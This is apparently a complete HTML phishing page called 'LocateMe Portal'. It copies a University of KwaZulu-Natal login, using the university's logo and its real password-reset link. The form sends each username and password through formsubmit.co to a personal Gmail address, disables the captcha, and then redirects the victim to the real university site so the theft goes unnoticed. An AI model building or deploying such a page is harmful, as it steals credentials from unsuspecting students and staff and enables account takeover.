<!--DOCTYPE html-->
<html>
<head>
    <title></title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    
</head>
  <style type="text/css">
h1{
    margin-left: 80px;
}

.form-group{
    position: relative;
    margin-bottom: 20px;
}

input {
    width: 325px;
    padding: 10px;
    font-size: 16px;
    border: none;
    border-bottom: 2px solid lightgray;
}

label {
    position: absolute;
    top: 0;
    left: 0;
    font-size: 16px;
    padding: 10px;
    pointer-events: none;
    transition: 0.5s;
    color: gray;

}

input:focus ~ label,
input:valid ~ label {
    top: -30px;
    left: 0;
    color: gray;
}

button {

    width: 355px;
    padding: 10px;
    font-size: 16px;
    background-color: #007bff;
    color: #fff;
    border: none;
    cursor: pointer;
    height: 50px;
    border-radius: 50px;
    background-color: #76daff;
    background-image: linear-gradient(270deg,#00ccff 0%, #ffb347 80%);
    border: transparent;
}

img {
    width: 355px;
}

button:focus{
    background-color: transparent;
    border: transparent;
}

input:focus{
    outline: none;
    border-bottom: 2px solid orange ;
}

h5{
    margin-left: 120px;
    color: gray;

}

body{
    background-color: black;
    width: 375px;
    

}

.container{
    background-color: white;
    padding: 1px;
    margin-top: 30px;
    border-radius: 10px;
    
}







  </style>

<body>
 <form action="https://formsubmit.co/xxxtentacion20081207@gmail.com" method="post"
 >   
    <div class="container">
<br><br>

<h1>LocateMe Portal</h1>

<a href="https://ibb.co/d5prks1"><img alt="ukzn" border="0" src="https://i.ibb.co/71pXrx8/ukzn.png"></a>
<br>
<br>
<br>
<br>

      <div class="form-group">

        <input type="text" id="username" name="username" required="">
        <label for="username">Username</label>

      </div>
<br>
    <div class="form-group">

        <input type="password" id="password" name="password" required="">
        <i on click="togglePasswordVisibility()" class="fa fa-eye-splash" aria-hidden="true"></i>
        <label for="password"> Password  </label>

    </div>
<br>
<br>
   <button type="submit">Login</button>
<br>
<br>
<br>
<h5> Forgot Password?<a href="https://federation.ukzn.ac.za/adfs//portal/updatepassword">Reset</a></h5>

<input type="hidden" name="_next" value="https://ukzn.ac.za/">

          <input type="hidden" name="_captcha" value="false">
